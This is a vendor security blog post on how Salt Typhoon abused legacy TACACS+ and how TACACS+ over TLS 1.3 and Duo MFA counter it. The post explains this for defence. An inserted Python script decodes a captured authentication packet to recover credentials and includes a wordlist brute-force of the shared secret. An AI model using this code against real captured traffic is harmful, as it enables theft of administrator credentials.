
Modernizing TACACS+: Why Full-Session Encryption Matters More Than Ever

Protect your network from Salt Typhoon-style attacks. Learn how Cisco ISE 3.4 uses TACACS+ over TLS 1.3 and Duo MFA to provide full-session encryption.


February 24, 2026


Security


Tal Surasky

A cybersecurity campaign by Salt Typhoon, a sophisticated group of threat actors believed to be state-sponsored, revealed a chilling reality: attackers don’t always need exploits to breach critical infrastructure. Instead, they used stolen credentials and protocol weaknesses to blend in seamlessly.

Here’s how their playbook unfolded, based on reports from Cisco Talos and other sources:

  • Target Administrators: Attackers focused on highly privileged network operators, the people who manage routers, switches, and firewalls, because their sessions and configuration files give the most access.
  • Harvest TACACS+ Traffic: Traditional TACACS+ (RFC 8907) sends its 12-byte header in the clear and only obfuscates the packet body by XORing it with an MD5-derived keystream keyed by a static shared secret; the RFC itself describes this as obfuscation, not encryption. Anyone who captures the traffic and holds the secret (for example, recovered from a stolen device configuration) can read usernames, authorization replies, accounting records, and every command issued.
  • Steal Credentials: Attackers captured TACACS+ traffic and device configurations, recovering shared secrets and passwords directly where the secret was known and brute-forcing weak secrets offline where it was not, to enable unauthorized access.
  • Exfiltrate Data: TACACS+ sessions and device configurations were quietly collected and sent offshore for analysis, masquerading as normal admin traffic.
  • Blend in as Admins: By elevating their privileges using stolen credentials, attackers authenticated like legitimate administrators, issuing commands and generating logs that appeared routine.
  • Evade Detection: By analyzing readable accounting data, attackers understood log patterns and cleared traces (e.g., .bash_history, auth.log) to cover their tracks.
  • Move Laterally and Persist: Over months or years, they expanded access across devices, maintaining durable footholds in critical infrastructure.

The cleverness of the campaign wasn’t breaking the system. It was living inside the system by abusing weaknesses in an outdated protocol.

The campaign’s success lay in exploiting TACACS+’s outdated security model, turning routine admin traffic into a goldmine for attackers.

The Legacy Problem: TACACS+ in a Modern Threat Environment

TACACS+ has been a cornerstone of device administration for decades, providing authentication, authorization, and accounting (AAA). However, its design reflects a pre-Zero Trust era:

  • Obfuscation, Not Encryption: The packet body is XORed with an MD5 keystream derived from a static shared secret that rarely changes and usually sits in device configurations; the header is cleartext and nothing protects integrity. Once the secret is known, usernames, commands, authorization replies, and accounting data are fully readable.
  • Replay Risk: There is no mutual authentication of client and server, no per-session key agreement, and no timestamp or nonce in the packet header. A party holding the shared secret can re-send or forge packets, so captured traffic could in principle be reused to authenticate or execute commands, though public reporting on Salt Typhoon does not document this.
  • Predictable Logs: Plaintext accounting messages allow attackers to study and anticipate log entries, aiding evasion tactics like log clearing.
  • Trusted-Network Assumption: TACACS+ was built for internal networks, not modern environments with remote access or untrusted connections.

These flaws make TACACS+ a liability in today’s threat landscape, where attackers exploit intercepted traffic to impersonate admins.
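As an added example (not code from the Cisco post or from Cisco), the Python script below reproduces the RFC 8907 body obfuscation and shows what a passive observer recovers from a captured TACACS+ authentication START packet: everything with the shared secret, nothing usable without it, and everything again after guessing a weak secret from a short wordlist. The shared key, session id, credentials, and addresses are constructed sample values, and the packet is built in-script rather than captured from a device.

```python
"""Added example (not from the Cisco post): RFC 8907 TACACS+ body obfuscation.

Builds a PAP authentication START packet the way a network device would, then
shows what an eavesdropper recovers with and without the shared secret. All
names, the key, the session id and the credentials are constructed sample values.
"""
import hashlib
import struct

# Header: version, type, seq_no, flags, session_id, length (RFC 8907 section 4.1).
HEADER_FMT = "!BBBBII"
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 12 bytes, always sent in the clear
TAC_PLUS_AUTHEN = 0x01
TAC_PLUS_UNENCRYPTED_FLAG = 0x01
VERSION_PAP = 0xC1                          # major 0xC, minor 1 (required for PAP)
# Authentication START body (section 5.1).
TAC_PLUS_AUTHEN_LOGIN = 0x01
TAC_PLUS_AUTHEN_TYPE_PAP = 0x02
TAC_PLUS_AUTHEN_SVC_LOGIN = 0x01
START_FMT = "!BBBBBBBB"   # action, priv_lvl, authen_type, service, 4 field lengths

# Constructed sample values (assumptions for this example, not real secrets).
SHARED_KEY = b"cisco123"
SESSION_ID = 0x5EC0FFEE


def pseudo_pad(session_id, key, version, seq_no, length):
    """Section 4.5 keystream: MD5_1 = MD5(session_id, key, version, seq_no),
    MD5_n = MD5(session_id, key, version, seq_no, MD5_n-1), concatenated, truncated."""
    prefix = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    pad, block = b"", b""
    while len(pad) < length:
        block = hashlib.md5(prefix + block).digest()
        pad += block
    return pad[:length]


def xor_body(body, session_id, key, version, seq_no):
    """XOR with the pad; the same call obfuscates and de-obfuscates. Nothing
    authenticates the result, so a wrong key or a flipped bit is never detected."""
    pad = pseudo_pad(session_id, key, version, seq_no, len(body))
    return bytes(b ^ p for b, p in zip(body, pad))


def build_authen_start(username, password, key, session_id, seq_no=1, unencrypted=False):
    """Encode a PAP authentication START as the device (TACACS+ client) would."""
    user, port, rem_addr, data = username.encode(), b"tty0", b"192.0.2.10", password.encode()
    body = struct.pack(START_FMT, TAC_PLUS_AUTHEN_LOGIN, 15, TAC_PLUS_AUTHEN_TYPE_PAP,
                       TAC_PLUS_AUTHEN_SVC_LOGIN, len(user), len(port), len(rem_addr), len(data))
    body += user + port + rem_addr + data
    flags = TAC_PLUS_UNENCRYPTED_FLAG if unencrypted else 0
    header = struct.pack(HEADER_FMT, VERSION_PAP, TAC_PLUS_AUTHEN, seq_no, flags, session_id, len(body))
    return header + (body if unencrypted else xor_body(body, session_id, key, VERSION_PAP, seq_no))


def recover_authen_start(packet, key):
    """What an eavesdropper holding `key` learns from one captured START packet.
    Returns None when the body does not parse (wrong key or damaged packet); the
    protocol gives no way to distinguish the two cases."""
    version, ptype, seq_no, flags, session_id, length = struct.unpack(HEADER_FMT, packet[:HEADER_LEN])
    if ptype != TAC_PLUS_AUTHEN or len(packet) != HEADER_LEN + length:
        return None
    body = packet[HEADER_LEN:]
    if not flags & TAC_PLUS_UNENCRYPTED_FLAG:
        body = xor_body(body, session_id, key, version, seq_no)
    if len(body) < struct.calcsize(START_FMT):
        return None
    action, priv, atype, svc, ul, pl, rl, dl = struct.unpack(START_FMT, body[:8])
    if ul + pl + rl + dl != len(body) - 8:
        return None   # field lengths inconsistent: wrong key or corrupted body
    fields, off = [], 8
    for n in (ul, pl, rl, dl):
        fields.append(body[off:off + n])
        off += n
    user, port, rem_addr, data = fields
    return {"username": user.decode("latin-1"), "port": port.decode("latin-1"),
            "rem_addr": rem_addr.decode("latin-1"), "priv_lvl": priv, "session_id": session_id,
            "password": data.decode("latin-1") if atype == TAC_PLUS_AUTHEN_TYPE_PAP else None,
            "obfuscated": not flags & TAC_PLUS_UNENCRYPTED_FLAG}


def brute_force_key(packet, wordlist):
    """Offline guessing: a correct guess is recognised because the body parses
    cleanly, so a weak shared secret falls to a wordlist with no server contact."""
    for guess in wordlist:
        if recover_authen_start(packet, guess) is not None:
            return guess
    return None


if __name__ == "__main__":
    captured = build_authen_start("netadmin", "P@ssw0rd!", SHARED_KEY, SESSION_ID)
    print("with secret   :", recover_authen_start(captured, SHARED_KEY))
    print("without secret:", recover_authen_start(captured, b"wrong"))
    print("guessed key   :", brute_force_key(captured, [b"secret", b"tacacs", b"cisco123"]))
```

Run it directly to see all three outcomes. The point to notice is that nothing in the packet authenticates the body: a wrong key yields garbage that merely fails a length check rather than a verification error, which is exactly what makes a weak shared secret guessable offline and what TLS 1.3's authenticated records remove.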

Why are replay attacks a concern?

While not explicitly confirmed in Salt Typhoon’s tactics, the risk of replay attacks in traditional TACACS+ is significant due to its lack of session-specific cryptographic protections:

  • Authentication Replay: Captured authentication exchanges could potentially be reused to gain access.
  • Authorization Replay: Captured authorization exchanges might be re-sent to obtain permission for privileged commands.
  • Command Replay: Recorded command strings could be repeated to mimic legitimate admin actions.

This vulnerability stems from TACACS+’s absence of ephemeral keys or timestamps, making captured traffic appear valid. Salt Typhoon’s credential theft and log manipulation highlight how such weaknesses can be exploited to blend into normal operations.

Cisco’s Answer: TACACS+ Over TLS 1.3

As part of our push toward more resilient infrastructure, Cisco has addressed these weaknesses with TACACS+ over TLS 1.3, available in Cisco Identity Services Engine (ISE) 3.4 Patch 4 and later and in our network operating systems (IOS XE 17.18.1, IOS XR 25.3.1, NX-OS 10.6.1). The implementation follows the IETF standard for the protocol, RFC 9887, and uses TLS 1.3 to provide:

  • Full-Session Encryption: The entire TACACS+ exchange, including usernames, authorization replies, commands, and accounting data, is carried inside a TLS 1.3 session, replacing the cleartext header and static-key obfuscation of the legacy protocol.
  • Replay Protection: Each TLS session negotiates ephemeral keys, and every record is authenticated, so a captured session cannot be replayed or reused.
  • Modern Cipher Suites: TLS 1.3 permits only authenticated (AEAD) cipher suites, includes downgrade protection, and can adopt post-quantum key exchange as it becomes available.

This directly counters the weaknesses exploited by Salt Typhoon, such as readable traffic exfiltration and potential session reuse, keeping admin traffic confidential and integrity-protected in transit.

Beyond Encryption: Duo MFA for Device Administration

Encryption secures data in transit, but stolen credentials remain a risk. Cisco’s ecosystem integrates Cisco ISE with Cisco Duo multi-factor authentication (MFA) to address this:

  • Duo MFA: Requires a second factor for device admin logins, neutralizing stolen or intercepted credentials.
  • Zero Trust Alignment: Continuous verification ensures that even valid credentials cannot be used without additional authentication, thwarting impersonation attempts that rely on credential theft.

This combination strengthens administrative access controls, aligning with Zero Trust principles of never trusting and always verifying.

Why This Matters: Identity-Based Attacks on Device Administration

Identity-based attacks are increasingly common among nation-state and criminal actors. Rather than relying on software exploits, attackers target protocols and credentials to gain persistent access. For organizations using traditional TACACS+:

  • You risk exposing usernames, commands, and accounting data in plaintext.
  • You are vulnerable to credential theft and potential session replay.
  • Your logs can be studied and manipulated by attackers.
  • You may not meet the expectations of frameworks such as NIST SP 800-53 (protection of authentication data in transit), FIPS 140-3 validated cryptography, or PCI DSS, which call for strong encryption and authentication of administrative access.

Cisco’s TACACS+ over TLS 1.3, combined with Duo MFA, offers a leading solution to secure device administration, supported by Cisco’s extensive experience in network security.

The Takeaway

Attackers like Salt Typhoon exploit weaknesses in outdated protocols to impersonate admins and persist undetected. Traditional TACACS+ leaves critical data exposed and vulnerable.

With Cisco ISE 3.4 Patch 4 and Duo MFA, you can:

  • Encrypt TACACS+ traffic with TLS 1.3.
  • Prevent credential interception and session replay.
  • Block unauthorized access with MFA.
  • Keep accounting data confidential in transit so attackers cannot study or alter it on the wire.
  • Align with compliance requirements (e.g., NIST, FIPS, PCI DSS).
  • Implement Zero Trust for device administration.

Security threats evolve rapidly. Your AAA strategy must keep pace. Cisco’s solution empowers you to secure your administrators and protect your infrastructure from sophisticated attacks.

[...]

